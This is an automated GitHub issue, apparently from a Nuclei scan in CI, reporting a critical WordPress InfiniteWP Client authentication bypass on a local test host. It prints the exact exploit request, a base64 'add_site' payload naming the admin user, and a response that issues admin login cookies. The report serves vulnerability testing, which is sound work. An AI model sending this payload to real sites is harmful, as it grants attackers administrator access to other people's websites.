[wordpress-infinitewp-auth-bypass] [critical] WordPress InfiniteWP Client Authentication Bypass found on http://127.0.0.1:31337

Question

[wordpress-infinitewp-auth-bypass] [critical] WordPress InfiniteWP Client Authentication Bypass found on http://127.0.0.1:31337

github-actions opened this issue 3 years ago · comments

github-actions commented 3 years ago

Details: wordpress-infinitewp-auth-bypass matched at http://127.0.0.1:31337

Protocol: HTTP

Full URL: http://127.0.0.1:31337/

Timestamp: Thu Jul 8 00:10:45 +0000 UTC 2021

Template Information

Key	Value
tags	wordpress,auth-bypass,wp-plugin
name	WordPress InfiniteWP Client Authentication Bypass
author	princechaddha
severity	critical

Request

POST / HTTP/1.1
Host: 127.0.0.1:31337
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0
Content-Length: 93
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Cache-Control: max-age=0
Connection: close
Content-Type: application/x-www-form-urlencoded
ContentLength: 3537
Upgrade-Insecure-Requests: 1
Accept-Encoding: gzip

_IWP_JSON_PREFIX_eyJpd3BfYWN0aW9uIjoiYWRkX3NpdGUiLCJwYXJhbXMiOnsidXNlcm5hbWUiOiJhZG1pbiJ9fQ==

Response

HTTP/1.1 200 OK
Connection: close
Content-Type: text/plain;charset=UTF-8
Date: Thu, 08 Jul 2021 00:10:45 GMT
Server: Apache/2.4.38 (Debian)
Set-Cookie: wp_wpfileupload_5b2dbabcbcf581dd4a9fba6cd728b7f5=KKNDkapbmmcqFDXeQBScq6PWMkzMZeSK; expires=Sat, 10-Jul-2021 00:10:45 GMT; Max-Age=172800; path=/
Set-Cookie: wordpress_5b2dbabcbcf581dd4a9fba6cd728b7f5=admin%7C1625875845%7CgrZ9GgvNeTl7Ui1ff10dQ36G4M7Oyn477fLAeFBRGd3%7C853cb1e9007bf5af25fc8a1693e330be377c11a49c0ff4b4bbe813bc1b8468c2; path=/wp-content/plugins; HttpOnly
Set-Cookie: wordpress_5b2dbabcbcf581dd4a9fba6cd728b7f5=admin%7C1625875845%7CgrZ9GgvNeTl7Ui1ff10dQ36G4M7Oyn477fLAeFBRGd3%7C853cb1e9007bf5af25fc8a1693e330be377c11a49c0ff4b4bbe813bc1b8468c2; path=/wp-admin; HttpOnly
Set-Cookie: wordpress_logged_in_5b2dbabcbcf581dd4a9fba6cd728b7f5=admin%7C1625875845%7CgrZ9GgvNeTl7Ui1ff10dQ36G4M7Oyn477fLAeFBRGd3%7C79ecf25a6d26252b2aaf0bcac09ea70d532a4297a0ccbaa42bd108e609b63a22; path=/; HttpOnly
Set-Cookie: wordpress_sec_5b2dbabcbcf581dd4a9fba6cd728b7f5=admin%7C1625875845%7CIjupHcsvO6FXdP81dx8iPieeiSceeGqJJf3JNKFAz9K%7Ce65c76bdd3f9e9a0ed18f704f851e3c5a0ca4eac7b3c9d7f060105a101f6905e; path=/wp-content/plugins; secure; HttpOnly
Set-Cookie: wordpress_sec_5b2dbabcbcf581dd4a9fba6cd728b7f5=admin%7C1625875845%7CIjupHcsvO6FXdP81dx8iPieeiSceeGqJJf3JNKFAz9K%7Ce65c76bdd3f9e9a0ed18f704f851e3c5a0ca4eac7b3c9d7f060105a101f6905e; path=/wp-admin; secure; HttpOnly
Set-Cookie: wordpress_logged_in_5b2dbabcbcf581dd4a9fba6cd728b7f5=admin%7C1625875845%7CIjupHcsvO6FXdP81dx8iPieeiSceeGqJJf3JNKFAz9K%7Cf7e1f7899faf365fe7af9bdbd10f01201be5c2fcdd97883fe1410428e0d8a961; path=/; HttpOnly
Vary: Accept-Encoding
X-Powered-By: PHP/7.1.33

<IWPHEADER>_IWP_JSON_PREFIX_eyJlcnJvciI6IkludmFsaWQgYWN0aXZhdGlvbiBrZXkiLCJlcnJvcl9jb2RlIjoiaXdwX21tYl9hZGRfc2l0ZV9pbnZhbGlkX2FjdGl2YXRpb25fa2V5In0=<ENDIWPHEADER>

Reference:

https://www.wordfence.com/blog/2020/01/critical-authentication-bypass-vulnerability-in-infinitewp-client-plugin/

Generated by Nuclei